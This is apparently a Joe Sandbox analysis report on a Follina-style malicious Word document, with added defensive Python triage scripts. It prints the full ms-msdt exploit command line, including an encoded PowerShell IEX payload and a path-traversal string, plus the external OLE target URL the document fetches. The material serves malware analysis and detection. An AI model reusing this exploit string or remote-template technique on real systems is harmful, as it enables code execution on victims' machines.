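        Added example (not from the report): Python that takes the msdt.exe command line shown in the process tree above and breaks it into the pieces a responder wants: the ms-msdt: switches, the IT_* parameters, the PowerShell $( ... ) subexpression embedded in IT_BrowseForFile, the -EncodedCommand payload (base64 of UTF-16LE) decoded to cleartext, and the file path that remains once the subexpression is removed and the ../ segments are resolved against a root. The command line is copied verbatim from the report; the parsing rules are generic to this command-line shape and are not something the report itself provides.

```python
"""Decode an ms-msdt: invocation of the kind recorded in this report.

Added example, not code from the Joe Sandbox report. MSDT_CMDLINE is the
command line copied verbatim from the report (including the stray leading
quote as printed); the parsing below is generic to that shape.
"""
import base64
import re
from typing import Dict, List, Optional

MSDT_CMDLINE = (
    'C:\\Windows\\system32\\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param '
    '"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand '
    'QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))'
    'i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe'
)


def parse_ms_msdt(cmdline: str) -> Dict[str, str]:
    """Split the ms-msdt: URI into its switches. /param's value is taken to the end
    of the line, because the quoting around it is consumed by the embedded PowerShell."""
    m = re.search(r"ms-msdt:(.*)$", cmdline, re.S)
    if not m:
        raise ValueError("no ms-msdt: URI in command line")
    head, sep, param_value = m.group(1).partition("/param")
    switches = {name: value for name, value in re.findall(r"/(\w+)\s+(\S+)", head)}
    if sep:
        switches["param"] = param_value.strip().lstrip('"')
    return switches


def split_params(param: str) -> Dict[str, str]:
    """Break the /param blob into IT_* key/value pairs; a value runs until the next IT_ key."""
    return dict(re.findall(r"(IT_\w+)=(.*?)(?=\s+IT_\w+=|$)", param, re.S))


def extract_subexpressions(value: str) -> List[str]:
    """Return the body of every PowerShell $( ... ) subexpression, matching
    parentheses by depth so nested calls such as IEX("...") stay intact."""
    bodies: List[str] = []
    i = 0
    while (start := value.find("$(", i)) != -1:
        depth, j = 0, start + 1
        while j < len(value):
            if value[j] == "(":
                depth += 1
            elif value[j] == ")":
                depth -= 1
                if depth == 0:
                    bodies.append(value[start + 2:j])
                    break
            j += 1
        i = j + 1
    return bodies


def strip_subexpressions(value: str) -> str:
    """Remove the $( ... ) parts, leaving the literal path fragments around them."""
    for body in extract_subexpressions(value):
        value = value.replace("$(" + body + ")", "", 1)
    return value


def decode_encoded_command(text: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand argument: base64 over UTF-16LE text."""
    m = re.search(r"-EncodedCommand\s+\"?([A-Za-z0-9+/=]+)", text, re.I)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


def collapse_traversal(path: str) -> str:
    """Resolve ../ segments as a root-anchored Windows path does: '..' at the
    root is discarded, so any surplus of them is harmless to the final path."""
    stack: List[str] = []
    for seg in re.split(r"[\\/]+", path):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
        else:
            stack.append(seg)
    return "/".join(stack)


def triage(cmdline: str) -> Dict[str, object]:
    """Everything a responder wants from one msdt.exe command line, in one dict."""
    switches = parse_ms_msdt(cmdline)
    params = split_params(switches.get("param", ""))
    browse = params.get("IT_BrowseForFile", "")
    subexprs = extract_subexpressions(browse)
    return {
        "troubleshooter": switches.get("id"),
        "skip": switches.get("skip"),
        "params": params,
        "subexpressions": subexprs,
        "decoded_powershell": next((d for d in map(decode_encoded_command, subexprs) if d), None),
        "existence_check_path": collapse_traversal(strip_subexpressions(browse)),
    }


if __name__ == "__main__":
    for key, val in triage(MSDT_CMDLINE).items():
        print(f"{key}: {val}")
```

For this sample the decoded PowerShell only shows a message box, which matches the low-impact verdict above, but the same decoder applies to any -EncodedCommand payload; the path that survives once the subexpression is removed points at an existing system binary, which is the check msdt performs on IT_BrowseForFile.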

        Data Obfuscation

        Source: 20220531_180800.rtf | Initial file: Document starts with PK
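        Added example (not part of the report or of the cited Yara rules): a Python pre-check for the two document-level findings on this page, the file named .rtf that is really an OOXML zip ("Document starts with PK", directly above) and the document.xml.rels relationship with an external target that the rules matched under System Summary describe. The package it scans is constructed in memory for the example; its external target reuses the URL extracted from this sample under Persistence and Installation Behavior below.

```python
"""Static pre-check for RTF/OOXML extension mismatch and external relationships.

Added example, not code from the Joe Sandbox report or from the Yara rules it
cites. build_constructed_sample() assembles a minimal OOXML package in memory
(constructed input); the external target string is the one the report extracted.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
STYLES_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"


def build_constructed_sample() -> bytes:
    """Constructed OOXML zip with one external oleObject relationship and one internal one."""
    rels = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{PKG_NS}">
  <Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="https://cyberleague.co/th1s.html!" TargetMode="External"/>
  <Relationship Id="rId2" Type="{STYLES_REL_TYPE}" Target="styles.xml"/>
</Relationships>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def detect_container(data: bytes) -> str:
    """Identify the real container from magic bytes, independent of the file extension."""
    if data.startswith(b"{\\rtf"):
        return "rtf"
    if data.startswith(b"PK\x03\x04"):
        return "ooxml-zip"
    if data.startswith(b"\xd0\xcf\x11\xe0"):
        return "ole2"
    return "unknown"


def external_relationships(data: bytes) -> List[Dict[str, str]]:
    """Every TargetMode="External" relationship across all .rels parts of the package."""
    hits: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    hits.append({
                        "part": name,
                        "id": rel.get("Id", ""),
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": rel.get("Target", ""),
                    })
    return hits


def assess(filename: str, data: bytes) -> Dict[str, object]:
    """Combine the container check with the relationship scan into one verdict."""
    container = detect_container(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    # An .rtf whose bytes are a zip is the "RTF is a DOCX" obfuscation finding.
    extension_mismatch = ext == "rtf" and container != "rtf"
    rels = external_relationships(data) if container == "ooxml-zip" else []
    # OLE object / attached template relationships with an external target are the
    # kind of relationship the matched rules' descriptions refer to.
    remote_ole = [r for r in rels if r["type"] in ("oleObject", "attachedTemplate")]
    return {
        "container": container,
        "extension_mismatch": extension_mismatch,
        "external_relationships": rels,
        "remote_ole": remote_ole,
        # Trailing "!" on the target, as seen in the target extracted from this sample.
        "bang_suffix": any(r["target"].endswith("!") for r in remote_ole),
        "verdict": "suspicious" if (extension_mismatch or remote_ole) else "clean",
    }


if __name__ == "__main__":
    print(assess("20220531_180800.rtf", build_constructed_sample()))
```

A genuine RTF is never a zip, so a PK header under an .rtf name is itself a strong signal; the relationship scan then tells you where the document will reach out to before any dynamic analysis is run.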

        Persistence and Installation Behavior

        Source: document.xml.rels | Extracted files from sample: https://cyberleague.co/th1s.html!
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (reported 101 times)
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exe; Window / User API: threadDelayed 1187
        Source: C:\Windows\SysWOW64\msdt.exe; Window / User API: threadDelayed 1129
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation (2 identical entries)
        MITRE ATT&CK matrix (a number in parentheses is the count of matched signatures for that technique; cells without a number had no matches):

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Command and Scripting Interpreter (1) | DLL Side-Loading (1) | Process Injection (1) | Masquerading (11) | OS Credential Dumping | Query Registry (1) | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Exploitation for Client Execution (23) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (1) | LSASS Memory | Application Window Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (1) | Security Account Manager | Remote System Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | DLL Side-Loading (1) | NTDS | File and Directory Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (13) | SIM Card Swap | Carrier Billing Fraud |
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Information Discovery (12) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |

        Screenshots (thumbnails not reproduced here): windows-stand
        No Antivirus matches
        Source | Detection | Scanner | Label
        https://roaming.edog. | 0% | URL Reputation | safe
        https://cdn.entity. | 0% | URL Reputation | safe
        https://powerlift.acompli.net | 0% | URL Reputation | safe
        https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
        https://cortana.ai | 0% | URL Reputation | safe
        https://api.aadrm.com/ | 0% | URL Reputation | safe
        https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe
        https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
        https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
        https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe
        https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
        https://api.aadrm.com | 0% | URL Reputation | safe
        https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
        https://www.odwebp.svc.ms | 0% | URL Reputation | safe
        https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
        https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
        https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
        https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
        https://ncus.contentsync. | 0% | URL Reputation | safe
        https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
        https://wus2.contentsync. | 0% | URL Reputation | safe
        https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
        https://ncus.pagecontentsync. | 0% | URL Reputation | safe
        https://cyberleague.co/th1s.html | 0% | Avira URL Cloud | safe
        https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        cyberleague.co | 13.250.15.191 | true | true | - | unknown

        Name | Malicious | Antivirus Detection | Reputation
        https://cyberleague.co/th1s.html | true | Avira URL Cloud: safe | unknown
        Source for every row below: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.dr

        Name | Malicious | Antivirus Detection | Reputation
        https://api.diagnosticssdf.office.com | false | - | high
        https://login.microsoftonline.com/ | false | - | high
        https://shell.suite.office.com:1443 | false | - | high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | false | - | high
        https://autodiscover-s.outlook.com/ | false | - | high
        https://roaming.edog. | false | URL Reputation: safe | unknown
        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | false | - | high
        https://cdn.entity. | false | URL Reputation: safe | unknown
        https://api.addins.omex.office.net/appinfo/query | false | - | high
        https://clients.config.office.net/user/v1.0/tenantassociationkey | false | - | high
        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | false | - | high
        https://powerlift.acompli.net | false | URL Reputation: safe | unknown
        https://rpsticket.partnerservices.getmicrosoftkey.com | false | URL Reputation: safe | unknown
        https://lookup.onenote.com/lookup/geolocation/v1 | false | - | high
        https://cortana.ai | false | URL Reputation: safe | unknown
        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | false | - | high
        https://cloudfiles.onenote.com/upload.aspx | false | - | high
        https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | false | - | high
        https://entitlement.diagnosticssdf.office.com | false | - | high
        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | false | - | high
        https://api.aadrm.com/ | false | URL Reputation: safe | unknown
        https://ofcrecsvcapi-int.azurewebsites.net/ | false | URL Reputation: safe | unknown
        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | false | - | high
        https://api.microsoftstream.com/api/ | false | - | high
        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | false | - | high
        https://cr.office.com | false | - | high
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | false | Avira URL Cloud: safe | low
        https://portal.office.com/account/?ref=ClientMeControl | false | - | high
        https://graph.ppe.windows.net | false | - | high
        https://res.getmicrosoftkey.com/api/redemptionevents | false | URL Reputation: safe | unknown
        https://powerlift-frontdesk.acompli.net | false | URL Reputation: safe | unknown
        https://tasks.office.com | false | - | high
        https://officeci.azurewebsites.net/api/ | false | URL Reputation: safe | unknown
        https://sr.outlook.office.net/ws/speech/recognize/assistant/work | false | - | high
        https://store.office.cn/addinstemplate | false | URL Reputation: safe | unknown
        https://api.aadrm.com | false | URL Reputation: safe | unknown
        https://outlook.office.com/autosuggest/api/v1/init?cvid= | false | - | high
        https://globaldisco.crm.dynamics.com | false | - | high
        https://messaging.engagement.office.com/ | false | - | high
        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | false | - | high
        https://dev0-api.acompli.net/autodetect | false | URL Reputation: safe | unknown
        https://www.odwebp.svc.ms | false | URL Reputation: safe | unknown
        https://api.diagnosticssdf.office.com/v2/feedback | false | - | high
        https://api.powerbi.com/v1.0/myorg/groups | false | - | high
        https://web.microsoftstream.com/video/ | false | - | high
        https://api.addins.store.officeppe.com/addinstemplate | false | URL Reputation: safe | unknown
        https://graph.windows.net | false | - | high
        https://dataservice.o365filtering.com/ | false | URL Reputation: safe | unknown
        https://officesetup.getmicrosoftkey.com | false | URL Reputation: safe | unknown
        https://analysis.windows.net/powerbi/api | false | - | high
        https://prod-global-autodetect.acompli.net/autodetect | false | URL Reputation: safe | unknown
        https://outlook.office365.com/autodiscover/autodiscover.json | false | - | high
        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | false | - | high
        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | false | - | high
        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | false | - | high
        https://ncus.contentsync. | false | URL Reputation: safe | unknown
        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | false | - | high
        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | false | - | high
        http://weather.service.msn.com/data.aspx | false | - | high
        https://apis.live.net/v5.0/ | false | URL Reputation: safe | unknown
        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | false | - | high
        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | false | - | high
        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | false | - | high
        https://management.azure.com | false | - | high
        https://outlook.office365.com | false | - | high
        https://wus2.contentsync. | false | URL Reputation: safe | unknown
        https://incidents.diagnostics.office.com | false | - | high
        https://clients.config.office.net/user/v1.0/ios | false | - | high
        https://insertmedia.bing.office.net/odc/insertmedia | false | - | high
        https://o365auditrealtimeingestion.manage.office.com | false | - | high
        https://outlook.office365.com/api/v1.0/me/Activities | false | - | high
        https://api.office.net | false | - | high
        https://incidents.diagnosticssdf.office.com | false | - | high
        https://asgsmsproxyapi.azurewebsites.net/ | false | URL Reputation: safe | unknown
        https://clients.config.office.net/user/v1.0/android/policies | false | - | high
        https://entitlement.diagnostics.office.com | false | - | high
        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | false | - | high
        https://substrate.office.com/search/api/v2/init | false | - | high
        https://outlook.office.com/ | false | - | high
        https://storage.live.com/clientlogs/uploadlocation | false | - | high
        https://outlook.office365.com/ | false | - | high
        https://webshell.suite.office.com | false | - | high
        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | false | - | high
                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistory4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://management.azure.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://clients.config.office.net/c2r/v1.0/InteractiveInstallation4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://login.windows.net/common/oauth2/authorize4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://graph.windows.net/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://api.powerbi.com/beta/myorg/imports4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://devnull.onenote.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ncus.pagecontentsync.4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://messaging.office.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://augloop.office.com/v24EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://skyapi.live.net/Activity/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://clients.config.office.net/user/v1.0/mac4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
13.250.15.191 | cyberleague.co | United States | 16509 | AMAZON-02US | true
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 639039
Start date and time: 2022-06-03 23:02:03 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 10s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 20220531_180800.rtf
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 28
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.expl.evad.winRTF@5/15@2/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .rtf
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.12.21, 52.109.76.34
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                            No simulations
Match | Associated Sample Name / URL | Detection
13.250.15.191 | 20220531_180800.rtf | malicious

No context
                                                                                                                                                              mjpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              mjpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              jpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              jpoc.docGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              QoIEPSoS7k.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              05-2022-0438.docGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19https://s3.amazonaws.com/nepasrepondre-notifications.canadapost-postescanada.ca32/AHdasgda4.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              Chrome.Quick.Update.ver.103.82.37782.jsGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              Chrome.Quick.Update.ver.103.82.37782.jsGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              Invoice_#6022022_PDF.htmGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              https://indd.adobe.com/view/cb389d38-bc80-431d-8345-7de75cf5f11cGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
                                                                                                                                                              Fedex Invoice Receipt.exeGet hashmaliciousBrowse
                                                                                                                                                              • 13.250.15.191
